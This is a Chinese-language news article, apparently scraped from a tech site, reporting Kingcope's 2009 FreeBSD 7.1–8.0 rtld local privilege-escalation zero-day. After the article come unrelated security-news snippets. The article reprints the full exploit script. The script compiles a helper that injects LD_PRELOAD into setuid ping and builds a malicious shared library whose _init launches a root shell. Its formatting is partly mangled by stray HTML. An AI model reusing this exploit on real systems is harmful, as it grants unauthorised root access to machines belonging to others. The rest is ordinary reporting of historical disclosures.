在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,
终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-
Editor(rtld)程序中,
普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从
2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,
例如 Sun Solaris telnetd及近期的IIS FTPd、Debian
OpenSSH等。接下来我们在最
新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。498)this.w
idth=498;' onmousewheel = 'javascript:return big(this)' border=0 alt="" src="http://images.51cto.com/files/uploadimg/
20091204/1916020.png" width=581 height=636>相关脚本
如下:#!/bin/shecho “FreeBSD local r00t zeroday by Kingcope on November 2009″cat > env.c << _EOF#include main() {extern char **environ;environ = (char**)malloc(8096);environ[0] = (char*)malloc(1024);environ[1] = (char*)malloc(1024);strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);execl(”/sbin/ping”, “ping”, 0);}_EOFgcc env.c -o env > /dev/null 2>&1#download from baoz.netcat > program.c << _EOF#include #include #include #include void _init() {extern char **environ;environ=NULL;system(”echo ALEX-ALEX;/bin/sh”);}_EOFgcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./envFreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。
FreeBSD爆严重安全漏洞 安全专家称疑是圣诞前的礼物
时间: 2024-10-24 02:40:43
FreeBSD爆严重安全漏洞 安全专家称疑是圣诞前的礼物的相关文章
甲骨文更新Java 安全专家称仍存漏洞
据路透社报道,此前 美国政府称Java存在安全漏洞,建议PC用户禁用该软件.甲骨文周日发布了Java浏览器版本的紧急更新.但据波兰安全公司SecurityExplorationsCEO.Java安全专家亚当·戈迪亚克(AdamGowdiak)称,甲骨文的更新还没有修复几个关键安全漏洞. 戈迪亚克在过去一年间发现Java软件存在数个漏洞.戈迪亚克说,"我们还不敢告诉用户现在可以重新启用Java了." 甲骨文发言人拒绝对戈迪亚克的分析发表评论. 甲骨文周日在其安全博客上表示,其更新修复了面
安全专家称不再向厂商免费提供漏洞信息
北京时间3月25日消息,据国外媒体报道,日前三个业界知名安全专家称,对于商用产品中发现的漏洞信息,不再向厂商免费提供. 安全专家迪诺·佐威(Dino Dai Zovi).查理·米勒(Charlie Miller)和亚历克斯·索特威(Alex Sotirov)表示,不再向厂商免费提供其产品中的安全漏洞信息,除非厂商肯制定机制来对他们的工作进行补偿.米勒则已经将这种想法付诸行动,在发现了一个安全漏洞后并未告知厂商,并且在不久前的黑客大赛上成功利用该漏洞实现了入侵,并因此而获得了一台MacBook和5
专家称兜售窃听产品的短信多为诈骗
□本版撰文 信息时报记者 潘敬文 实习生 林恒华 弗洛伊德曰:"窥探他人隐私能带来快感."窃听虽然不合法,但无论从商业行为.情感关系上,都能满足人们的窥探欲,更能获得意想不到的利益.因此,借"窃听"之名行骗往往更容易"中标". 近日,不少市民向记者爆料称手机收到有公司发来的促销短信称能提供窃听产品,只要提供对方号码,就可以知道他的"通话+短信"内容,甚至透过GPS定位监控对方行踪.不过据记者向相关专家了解到,运营商的数据库与外
反病毒还是留后门?卡巴斯基反病毒服务器被爆多个漏洞
本文讲的是反病毒还是留后门?卡巴斯基反病毒服务器被爆多个漏洞, 1.漏洞信息 类别:Web页面生成("跨站点脚本")[CWE-79],跨站点请求伪造[ CWE-352 ],不正确的特权管理[ CWE-269 ],路由名称不正确的中和受限目录[ CWE-22 ] 影响:代码执行,安全绕过,信息泄漏 远程利用:是 本地利用:是 CVE名称:CVE-2017-9813,CVE-2017-9810,CVE-2017-9811,CVE-2017 -9812 2.漏洞描述 卡巴斯基实验室的网站:
蓝牙协议实现爆严重安全漏洞,可在旧版本设备上构建勒索僵尸网络
本文讲的是蓝牙协议实现爆严重安全漏洞,可在旧版本设备上构建勒索僵尸网络, 如果你正在使用支持蓝牙功能的设备,那么请注意了!现在,无论你是使用智能手机.笔记本电脑.智能电视还是其他任何具备蓝牙功能的物联网设备,你都可能会遭遇恶意软件攻击,攻击者可以在无需与你进行任何交互的情况下远程接管你的设备. 近日,据外媒报道称,安全研究人员刚刚在蓝牙协议中发现了8个零日漏洞,这些漏洞将影响超过53亿设备--从Android.iOS.Windows以及Linux系统设备到使用短距离无线通信技术的物联网设备,无一
国航爆账号串联漏洞,可“无限”获取他人航班信息
本文讲的是国航爆账号串联漏洞,可"无限"获取他人航班信息,在新京报今天发布的"APP泄露航班信息 80元买到鹿晗航班行程"报道中,曝光了国内某知名航空公司APP存在账号串联漏洞,导致用户身份信息泄漏.航班行程被取消. 报道里没有点明航空公司的名字,不过嘶吼编辑根据提示检索网络资料,发现该航空公司极有可能是国航,而漏洞可能出在国航的订票APP系统上. 用户账号串联漏洞 据新京报采访,林琳(化名)是这次漏洞的受害者之一.由于漏洞影响,她的身份信息.航班订单被串联到周红(
专家称移动电子钱包更安全 但并不绝对
本文讲的是 : 专家称移动电子钱包更安全 但并不绝对 , [IT168 评论]据国外媒体报道,研究人员警告,为移动手机用户提供虚拟钱包服务的公司一再地努力确保其用户的财产安全,但是仍然存在一些缺陷使这些钱财成为那些盗贼诱人的目标.McAfee(迈克菲:从事杀毒和电脑安全的美国公司)移动安全专家 Jimmy Shah,只要安全研究人员一旦提醒安全问题,一些组织就急匆匆地修复可能存在的漏洞. 但是移动支付软件及支持近距离无线通讯技术的设备对电脑犯罪分子来说,仍然是极具吸引力的.Shah称,"移动
专家称网帖侵权网站不承担责任
中介交易 SEO诊断 淘宝客 云主机 技术大厅 自称遭网帖诽谤 告发帖人,还是告网站 法律专家称网站不必对网民发表意见承担责任,过多限制网友发帖有伤公民言论自由 匿名网友在网站论坛上跟帖,大爆深圳某公交线路车队队长的"丑事",其中提到了三个"主角"的真实姓名.其中一名"女主角"感觉遭到人身侮辱和诽谤,向警方报案,并将网站告上法庭.昨日上午,此案在福田区人民法院开审,目前暂未宣判.据了解,这是深圳首起涉及网站论坛发帖的侵权案件. 我国的网络侵权案件
专家称:转移到云意味着关注加密
本文讲的是专家称:转移到云意味着关注加密,继最近索尼PlayStation网络和电子邮件营销公司Epsilon公司发生大规模数据泄露事故后,安全专家警告说,云服务用户需要密切关注数据保护和加密. 存储在互联网可访问的服务器上的信息,特别是客户数据或者重要企业数据,应该使用加密技术进行妥善的保护,这不只是为了满足行业和政府法规, 而是为了维护企业利益, CloudSwitch公司的创始人兼首席技术官John Considine表示. 攻击者偷走了大约100万来自索尼账户的信息,以及Epsilon数